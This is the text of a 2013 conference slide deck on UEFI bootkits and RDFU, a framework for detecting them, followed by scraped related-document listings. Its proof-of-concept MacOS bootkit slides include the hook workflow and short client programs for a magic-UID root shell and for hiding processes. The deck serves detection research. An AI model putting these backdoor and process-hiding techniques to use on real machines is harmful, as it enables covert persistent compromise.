PRESS ROOT TO CONTINUE: DETECTING OSX AND WINDOWS BOOTKITS WITH RDFU
1 Mario Vuksan & Tomislav Pericin, BlackHat USA 2013, Las Vegas. PRESS ROOT TO CONTINUE: DETECTING OSX AND WINDOWS BOOTKITS WITH RDFU
2 Agenda
- Our motivation
- Who are we
- Introduction to Unified Extensible Firmware Interface (UEFI)
- Previous UEFI bootkit research
- Rootkit detection framework RDFU
- Framework design
- VMWare implementation demo
- MacOSX bootkit demo
3 Our motivation
- UEFI is very popular: Windows + Android + MacOS+
- Full-stack: UEFI is a mini-OS
- Memory and file manipulation, full network stack
- Graphics APIs, device management
- Remote boot
- Attacker's paradise
- No tools for analysis, low visibility, even no AV
- Some good news though: UEFI SecureBoot (Surface RT, Android)
4 Who are we
- ReversingLabs, founded by Mario Vuksan and Tomislav Pericin in 2009
- Focusing on deep binary analysis of PE/ELF/Mach-O/DEX and firmware
- System reputation and anomaly detections
- Black Hat presentations and open source projects:
- TitanEngine: PE reconstruction library (2009)
- NyxEngine: Archive format stego detection tool (2010)
- TitanMist: Unpacking (2010)
- Unofficial guide to PE malformations (2011)
- FDF: disinfection framework (2012)
- RDFU: UEFI rootkit detection framework (2013)
5 Thanks
- John Heasman, Black Hat 2007
- Snare, Assurance, Black Hat 2012
- Dan Griffin, Defcon 2012
- Sebastien Kaczmarek, HITB Amsterdam 2013
- DARPA CFT
6 UEFI unified extensible firmware interface
7 Booting with BIOS BIOS MBR REAL MODE (16 bit) NTLDR NTOSKRNL.EXE KERNEL HAL SMS USERLAND WIN32 Distribution Statement A (Approved for Public Release, Distribution Unlimited)
8 UEFI?
- UEFI: Unified extensible firmware interface
- Originally developed by Intel, Intel boot initiative
- Community effort to modernize PC booting process
- Currently ships as a boot option alongside legacy BIOS
- Aims to be the only booting interface in the future
- Used in all Intel Macs and other PC motherboards
- Managed by Unified Extensible Firmware Interface (UEFI) Forum
9 Booting with EFI UEFI UEFI bootloader \EFI\Microsoft\Boot\bootmgfw.efi PROTECTED MODE winload.efi NTOSKRNL.EXE KERNEL HAL SMS USERLAND WIN32
10 UEFI Conceptual overview Operating system EFI Operating system loader Other interfaces (ACPI, SMBIOS ) EFI Boot services Platform hardware EFI runtime services EFI partition
11 EFI boot sequence EFI Driver EFI Application EFI Boot code OS Loader Platform init EFI image load EFI OS loader load Boot service terminates Standard firmware initialization Drivers and applications loaded Boot from ordered EFI OS list Operations handed off to OS Boot Manager EFI images
12 UEFI images
- UEFI images: typically PE32/PE32+ (basic format feature subset)
- The standard also provides that other formats can be defined by anyone implementing the specification, e.g. TE, defined by Intel and used by Apple
13 UEFI images
- UEFI drivers:
- Boot service driver: terminated once ExitBootServices() is called
- Runtime service driver
- UEFI applications:
- EFI application: normal EFI applications must execute in the pre-boot environment
- OS loader application: special UEFI application that can take control of the system by calling ExitBootServices()
14 UEFI Boot services
- UEFI boot services: functions that are available before ExitBootServices() is called
- These functions can be categorized as global, handle based and dynamically created protocols
- Global: system services available on all platforms
- Event, Timer and Task Priority services
- Memory allocation services
- Protocol handler services
- Image services
- Miscellaneous services
- Handle based: specific functionality not available everywhere
15 UEFI Runtime services
- UEFI runtime services: functions that are available before and after ExitBootServices() is called
- These functions can be categorized as global, handle based and dynamically created protocols
- Global: system services available on all platforms
- Runtime rules and restrictions
- Variable services
- Time services
- Virtual memory services
- Miscellaneous services
- Handle based: specific functionality not available everywhere
16 EDK2 EFI development kit
- TianoCore: Intel's reference implementation
- Enables writing EFI applications and drivers in C
- Has its own stdlibc implementation that covers a part of the standard library
- Has a set of packages for shell, crypto, emulation and more
- Has a set of applications built with the stdlibc implementation, for example Python 2.7
- Has a build system which uses popular compilers (VS, GCC and XCode)
- Supported CPUs: IA64, x86-64 and ARM
17 EDK2 HelloWorld.c

    #include <Uefi.h>
    #include <Library/UefiLib.h>          /* Print() */
    #include <Library/ShellCEntryLib.h>   /* provides the ShellAppMain() entry point */

    /***
      Print a welcoming message.
      Establishes the main structure of the
      0      The application exited
      Other  An error occurred.
    ***/
    INTN
    EFIAPI
    ShellAppMain(
      IN UINTN   Argc,
      IN CHAR16  **Argv
      )
    {
      Print(L"Hello there fellow Programmer.\n");
      Print(L"Welcome to the world of EDK II.\n");
      return(0);
    }

18 UEFI - HelloWorld.c

    #include <Uefi.h>
    #include <Library/UefiLib.h>          /* Print() */

    /***
      Print a welcoming message.
      Establishes the main structure of the
      0      The application exited
      Other  An error occurred.
    ***/
    INTN
    EFIAPI
    UEFIAppMain(
      IN EFI_HANDLE        ImageHandle,
      IN EFI_SYSTEM_TABLE  *SystemTable   /** Boot and Runtime services **/
      )
    {
      Print(L"Hello there fellow Programmer.\n");
      return(0);
    }

19 Bootkits attacking unified extensible firmware interface
20 Previous work 07
- Hacking extensible firmware interface
- John Heasman, NGS Consulting
- Presented at BlackHat 2007, USA
- Research:
- Modifying NVRAM variables
- Code injection attacks
- Shimming boot services
- Abusing system management mode
21 Previous work 12
- Hacking extensible firmware interface
- Snare, Assurance
- Presented at BlackHat 2012, USA
- Research:
- Patching MacOS X kernel
- Evil maid attack
22 Previous work 13
- Dreamboot: Windows 8 x64 bootkit
- Sébastien Kaczmarek, QuarksLab
- Presented at HackInTheBox 2013, Amsterdam
- Modus operandi:
- Bypasses kernel protections (NX and Patch guard)
- Bypasses local authentication
- Elevates process privileges
23 Dreamboot UEFI UEFI bootloader \EFI\Microsoft\Boot\bootmgfw.efi winload.efi NTOSKRNL.EXE HAL HOOK! HOOK! HOOK! KERNEL CALLBACK SMS USERLAND WIN32 CALLBACK
24 RDFU rootkit detection framework for uefi
25 What is RDFU?
Set of EFI applications and drivers that enable:
- Listing all EFI drivers loaded into memory
- Probing entire memory range, scanning for executable
- Monitoring newly loaded drivers until operating system starts
- Listing and scanning EFI BOOT SERVICES and EFI RUNTIME SERVICES for modified function pointers
- Continually monitoring EFI BOOT SERVICES and EFI RUNTIME SERVICES while operating system is being loaded
- Displaying memory map and dumping all suitable regions
- Listing and monitoring EVENT callbacks that can be used by rootkits/malware
- Working in a standalone mode without the EFI shell
26 What does RDFU support?
Supported UEFI implementations:
- UEFI 2.x specification for 32-bit and 64-bit implementations
- UEFI 1.x specification
- MacOS UEFI implementation
- VirtualBox
- VMWare
Not supported UEFI implementations:
- UEFI ARM implementation (only on Surface RT, has secure boot enabled)
27 How does RDFU work?
- DXE driver loaded via UEFI shell
- DXE driver loaded from USB thumb drive
- Scanner application run from UEFI shell
- Logging and dumping is done to the mounted hard drive or the USB thumb drive
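The service-table scan listed on the "What is RDFU?" slide, sketched as an added example; it is not RDFU's code, and the slides do not show how RDFU implements the check. It assumes a scanner that attributes every service pointer to a loaded image and compares it with an earlier snapshot; the type and function names, image list and addresses are all constructed, and the model runs on a host rather than in the pre-boot environment.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* A loaded EFI image. A real scanner would fill this from each image's
 * EFI_LOADED_IMAGE_PROTOCOL (ImageBase, ImageSize); here it is constructed. */
typedef struct {
    const char *name;
    uint64_t    base;
    uint64_t    size;
    int         firmware;   /* 1 = shipped in platform firmware, 0 = loaded later */
} image_t;

/* One function-pointer slot of a boot or runtime services table. */
typedef struct {
    const char *service;
    uint64_t    ptr;
} slot_t;

typedef enum { SLOT_OK, SLOT_CHANGED, SLOT_FOREIGN_IMAGE, SLOT_NO_IMAGE } verdict_t;

static const char *verdict_name(verdict_t v)
{
    switch (v) {
    case SLOT_OK:            return "ok";
    case SLOT_CHANGED:       return "changed since snapshot";
    case SLOT_FOREIGN_IMAGE: return "points into non-firmware image";
    default:                 return "points outside every loaded image";
    }
}

/* Return the image whose [base, base+size) range contains ptr, or NULL. */
static const image_t *owner_of(uint64_t ptr, const image_t *imgs, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        /* subtraction form avoids overflow of base + size */
        if (ptr >= imgs[i].base && ptr - imgs[i].base < imgs[i].size)
            return &imgs[i];
    }
    return NULL;
}

/* Classify one slot; snap may be NULL when no earlier snapshot exists. */
verdict_t check_slot(const slot_t *cur, const slot_t *snap,
                     const image_t *imgs, size_t nimgs)
{
    const image_t *o = owner_of(cur->ptr, imgs, nimgs);
    if (o == NULL)      return SLOT_NO_IMAGE;       /* e.g. code copied into pool memory */
    if (!o->firmware)   return SLOT_FOREIGN_IMAGE;  /* service redirected into a loaded app */
    if (snap != NULL && snap->ptr != cur->ptr)
        return SLOT_CHANGED;                        /* moved, even though still in firmware */
    return SLOT_OK;
}

/* Scan a whole table; writes one verdict per slot, returns the flagged count. */
size_t scan_table(const slot_t *cur, const slot_t *snap, size_t nslots,
                  const image_t *imgs, size_t nimgs, verdict_t *out)
{
    size_t flagged = 0;
    for (size_t i = 0; i < nslots; i++) {
        out[i] = check_slot(&cur[i], snap ? &snap[i] : NULL, imgs, nimgs);
        if (out[i] != SLOT_OK)
            flagged++;
    }
    return flagged;
}

/* ---- constructed sample data (not taken from a real machine) ---- */
static const image_t IMAGES[] = {
    { "DxeCore",     0x7F000000ULL, 0x40000ULL, 1 },
    { "RuntimeDxe",  0x7E800000ULL, 0x10000ULL, 1 },
    { "bootx64.efi", 0x7E100000ULL, 0x08000ULL, 0 },
};
/* Boot and runtime service slots shown in one table for brevity. */
static const slot_t SNAPSHOT[] = {
    { "AllocatePages",    0x7F001200ULL },
    { "LoadImage",        0x7F004A00ULL },
    { "ExitBootServices", 0x7F005100ULL },
    { "CreateEvent",      0x7F002300ULL },
    { "GetVariable",      0x7E801800ULL },
};
static const slot_t CURRENT[] = {
    { "AllocatePages",    0x7F001200ULL },
    { "LoadImage",        0x7E100440ULL },
    { "ExitBootServices", 0x7D000400ULL },
    { "CreateEvent",      0x7F002380ULL },
    { "GetVariable",      0x7E801800ULL },
};
#define NSLOTS (sizeof CURRENT / sizeof CURRENT[0])

size_t run_demo(verdict_t *out)
{
    return scan_table(CURRENT, SNAPSHOT, NSLOTS,
                      IMAGES, sizeof IMAGES / sizeof IMAGES[0], out);
}

int main(void)
{
    verdict_t v[NSLOTS];
    size_t flagged = run_demo(v);
    for (size_t i = 0; i < NSLOTS; i++) {
        const image_t *o = owner_of(CURRENT[i].ptr, IMAGES, sizeof IMAGES / sizeof IMAGES[0]);
        printf("%-18s 0x%08llx  %-12s %s\n", CURRENT[i].service,
               (unsigned long long)CURRENT[i].ptr, o ? o->name : "-", verdict_name(v[i]));
    }
    printf("%zu of %zu slots flagged\n", flagged, (size_t)NSLOTS);
    return flagged ? 1 : 0;
}
```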
28 VMWARE
29 VMWARE
30 VMWARE
31 VMWARE
32 VMWARE
33 DEMO rootkit detection framework for uefi
34 MAC OS 10.7.x bootkit first MacOS X bootkit example
35 Bootkit goals
- Create hidden folders
- Hiding (with un-hiding) processes
- Execute shell with root privileges
- Retrieve FileVault password
36 Running the MacOS bootkit Mac OS X 10.7.x - Lion
37 Running the MacOS bootkit Boot the OS from a USB thumb drive
38 VMWare / MacOS bootkit
- MacOS can also be run in VMWare if you don't have a MacBook Pro handy
- Running MacOS under VMWare requires an unofficial patch (wink wink, nudge nudge)
- Once patched we need to change the VMX file: firmware = "efi"
- After that MacOS can be installed with EFI 1.10
39 Bootkit workflow UEFI EFI\boot\bootx64.efi BS->CreateEvent EVT_SIGNAL_VIRTUAL_ADDRESS_CHANGE SystemTable->ConIn->ReadKeyStroke BS->OpenProtocol LoadedImage->Unload Register event callback HOOK! Fail safe Load Mac OS X
40 Bootkit workflow Load Mac OS X Enumerate drives \System\Library\CoreServices\boot.efi User choice on multiple OS X instances found BS->LoadImage BS->StartImage
41 Bootkit workflow SIGNAL EVT_SIGNAL_VIRTUAL_ADDRESS_CHANGE EVENT SetVirtualAddressMap() Locate syscall table Hook syscalls: setuid, getdirentries, getdirentriesattr & sysctl HOOK!
42 Getting ROOT

    #include <stdlib.h>   /* system() */
    #include <unistd.h>   /* setuid() */

    /*** executes shell with root rights ***/
    #define HIDDEN_UID 1911

    int main( void )
    {
        /* the bootkit's setuid hook recognises this magic UID */
        setuid(HIDDEN_UID);
        system("/bin/sh");
    }

43 Hiding processes

    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/types.h>
    #include <sys/sysctl.h>

    /*** sends the pid to the rootkit that should be hidden ***/
    /* CTL_ADD_PID is the bootkit's own sysctl selector; its value is not shown on the slide */
    int main(int argc, char *argv[])
    {
        int err;
        size_t length = 0;
        pid_t pid = atoi(argv[1]);
        printf("adding pid %d (%08x) hide list\n", pid, pid);
        int name[] = { CTL_ADD_PID, pid, KERN_PROC_ALL, 0 };
        err = sysctl((int*)name, (sizeof(name) / sizeof(*name)) - 1, NULL, &length, NULL, 0);
        printf("all done, sysctl returned 0x%08x\n", err);
        return EXIT_SUCCESS;
    }

44 DEMO MacOS X bootkit
45 QA Thanks!
Do as I Say not as I Do Stealth Modification of Programmable Logic Controllers I/O by Pin Control Attack ALI ABBASI SYSSEC GROUP, RUHR UNIVERSITY BOCHUM, GERMANY & SCS GROUP UNIVERSITY OF TWENTE, NETHERLANDS
More information518 Lecture Notes Week 3
518 Lecture Notes Week 3 (Sept. 15, 2014) 1/8 518 Lecture Notes Week 3 1 Topics Process management Process creation with fork() Overlaying an existing process with exec Notes on Lab 3 2 Process management
More informationECE 550D Fundamentals of Computer Systems and Engineering. Fall 2017
ECE 550D Fundamentals of Computer Systems and Engineering Fall 2017 The Operating System (OS) Prof. John Board Duke University Slides are derived from work by Profs. Tyler Bletsch and Andrew Hilton (Duke)
More informationUEFI Development Anti- Patterns
presented by UEFI Development Anti- Patterns Spring 2017 UEFI Seminar and Plugfest March 27-31, 2017 Presented by Chris Stewart (HP Inc.) Lead Security Developer, Firmware Updated 2011-06- 01 UEFI Plugfest
More informationThe Slide does not contain all the information and cannot be treated as a study material for Operating System. Please refer the text book for exams.
The Slide does not contain all the information and cannot be treated as a study material for Operating System. Please refer the text book for exams. Operating System Services User Operating System Interface
More informationCertifying Program Execution with Secure Processors. Benjie Chen Robert Morris Laboratory for Computer Science Massachusetts Institute of Technology
Certifying Program Execution with Secure Processors Benjie Chen Robert Morris Laboratory for Computer Science Massachusetts Institute of Technology Motivation All PCs may soon include trusted computing
More informationReverse Engineering Malware Dynamic Analysis of Binary Malware II
Reverse Engineering Malware Dynamic Analysis of Binary Malware II Jarkko Turkulainen F-Secure Corporation Protecting the irreplaceable f-secure.com Advanced dynamic analysis Debugger scripting Hooking
More informationOperating System: Chap2 OS Structure. National Tsing-Hua University 2016, Fall Semester
Operating System: Chap2 OS Structure National Tsing-Hua University 2016, Fall Semester Outline OS Services OS-Application Interface OS Structure Chapter2 OS-Structure Operating System Concepts NTHU LSA
More informationTDDI04, K. Arvidsson, IDA, Linköpings universitet Operating System Structures. Operating System Structures Overview. Operating System Services
TDDI04 Concurrent Programming, Operating Systems, and Real-time Operating Systems Operating System Structures [SGG7] Chapter 2 Copyright Notice: The lecture notes are mainly based on Silberschatz s, Galvin
More informationAMT vpro ME. How to Become the Sole Owner of Your PC. ptsecurity.com
AMT vpro ME How to Become the Sole Owner of Your PC Mark Ermolov Maxim Goryachy Dmitry Malkin AMT disable techniques Positive Research Center What is it? Second «hidden» processor in your PC Built into
More informationCIS 21 Final Study Guide. Final covers ch. 1-20, except for 17. Need to know:
CIS 21 Final Study Guide Final covers ch. 1-20, except for 17. Need to know: I. Amdahl's Law II. Moore s Law III. Processes and Threading A. What is a process? B. What is a thread? C. Modes (kernel mode,
More informationIntroduction to OS Processes in Unix, Linux, and Windows MOS 2.1 Mahmoud El-Gayyar
Introduction to OS Processes in Unix, Linux, and Windows MOS 2.1 Mahmoud El-Gayyar elgayyar@ci.suez.edu.eg Mahmoud El-Gayyar / Introduction to OS 1 Processes in Unix, Linux, and Windows Unix pre-empted
More informationApple Exam 9L0-412 OS X Support Essentials 10.8 Exam Version: 6.3 [ Total Questions: 86 ]
s@lm@n Apple Exam 9L0-412 OS X Support Essentials 10.8 Exam Version: 6.3 [ Total Questions: 86 ] Question No : 1 You are logged into a MacBook Pro as a standard user. How can you display the OS X Mountain
More information